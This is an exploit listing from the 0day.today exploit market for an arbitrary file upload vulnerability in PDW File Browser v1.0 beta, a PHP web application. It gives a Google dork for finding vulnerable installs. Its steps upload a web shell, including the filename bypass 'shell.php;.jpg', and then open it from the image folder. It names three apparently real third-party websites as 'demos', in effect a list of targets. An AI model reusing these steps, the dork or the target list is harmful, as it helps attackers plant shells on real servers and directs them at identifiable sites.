[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PDW File Browser v1.0 beta Arbitrary File Upload Vulnerability

Author
Zikou-16
Risk
[
Security Risk High
]
0day-ID
0day-ID-19986
Category
web applications
Date add
15-12-2012
Platform
php
-------------------------------------------------------------------------------
         pdw file browser Arbitrary File Upload Vulnerability
--------------------------------------------------------------------------------
 

#####
# Author => Zikou-16
#
# Facebook => http://fb.me/Zikou.se
#
# Google Dork => inurl:"pdw_file_browser"
#
# Tested on : Windows 7 , Backtrack 5r3 
####

Exploit :

Go to => http://localhost/pdw_file_browser/  => Upload => Browse...

& upload your shell => shell.php or try with shell.php;.jpg

your shell : 4 example => Currently uploading in folder: /pdw_file_browser/img/
                       => http://localhost/pdw_file_browser/img/shell.php
                       => http://localhost/pdw_file_browser/img/shell.php;.jpg

------------------------------

[#] Demos :

http://www.peterkiss.com/pdw_file_browser/
http://blueskybrokers.org/pdw_file_browser/
http://www.hss.ed.ac.uk/web-team/test/editpage/pdw_file_browser/

------------------------------ The End

#  0day.today [2024-11-04]  #